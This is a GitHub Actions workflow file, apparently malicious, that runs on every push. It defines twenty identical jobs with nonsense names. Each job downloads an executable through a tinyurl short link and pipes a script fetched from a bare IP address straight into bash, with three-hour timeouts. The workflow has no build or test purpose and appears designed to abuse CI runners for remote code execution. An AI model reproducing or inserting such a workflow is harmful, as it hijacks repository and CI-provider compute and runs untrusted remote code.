name: jofofo
on: push
jobs:
  lesati:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  yabamowe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  zilize:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  toziyoya:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  sofidi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  rotipa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  nufelewo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  sikegu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  pexifu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  bobaje:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  bovuvahi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  cugebi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  sivosu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  zilaheso:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  sunaba:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  rojenudu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  jacunu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  zacebife:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  sajufo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
  liwala:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://tinyurl.com/rulunivame; chmod +x rulunivame
    - name: Update
      run: curl http://103.186.1.39/mandalorian/nilcbbrzaxenrywaq.php?a=wuzesu | bash -
